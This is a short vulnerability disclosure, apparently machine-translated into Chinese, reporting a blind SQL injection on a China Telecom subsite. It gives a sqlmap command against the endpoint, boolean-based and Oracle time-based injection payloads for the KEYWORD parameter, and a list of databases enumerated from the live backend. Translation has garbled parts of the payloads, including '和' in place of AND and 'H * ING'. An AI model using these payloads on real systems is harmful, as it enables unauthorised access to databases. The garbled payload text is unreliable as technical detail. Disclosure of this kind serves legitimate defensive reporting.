漏洞标题 中国电信分站的SQL盲点 相关制造商 电信 漏洞作者 过路人 提交时间 2016-05-11 21: 00 公共时间 2016-06-27 17: 00 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 10 漏洞状态 已提交给第三方合作机构(cncert National Internet Emergency Center) 标签标签 漏洞详细信息 Sqlmap.py -u'http://**。**。**。**/webBuyAction.do; jsessionid=CC * 9BF21E4CFF1E399687470B91E04E?action=topSearch' - data'stTYPEID=1& CAPITALCODE=0& KEYWORD=1' - 关键字 漏洞证明: 放置: POST 参数: KEYWORD 输入:基于布尔值的盲 标题: AND基于布尔的盲 - WHERE或H * ING子句 有效载荷: strTYPEID=1& CAPITALCODE=0& KEYWORD=1%'AND 7253=7253 AND'%'=' 输入:和/或基于时间的盲 标题: Oracle和基于时间的盲人 有效载荷: strTYPEID=1& CAPITALCODE=0& KEYWORD=1%'和7543=DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)|| CHR(100)|| CHR(98)|| CHR(107),5)AND'% '=' --- 后端DBMS: Oracle 可用数据库[6]: [*] BIZCOMP [*] OUTLN [*] PERFSTAT [*] SYS [*]系统 [*] WMSYS
修理计划: 版权声明:请注明出处。居民A @乌云